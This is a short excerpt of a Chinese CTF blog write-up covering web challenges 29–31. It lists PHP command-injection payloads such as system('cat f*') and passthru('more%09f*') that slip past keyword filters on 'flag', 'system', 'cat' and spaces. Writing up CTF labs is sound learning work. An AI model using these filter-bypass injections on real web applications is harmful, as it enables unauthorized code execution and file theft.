摘要: #web29 过滤了flag ?c=system("cat f*"); #web30 过滤了system|flag,用一个代替system()的函数 ?c=passthru("cat f*"); #web31 过滤了system|cat|flag|空格 ?c=passthru("more%09f*" 阅读全文
posted @ 2020-10-03 22:08 Pur3 阅读(3645) 评论(0) 推荐(3) 编辑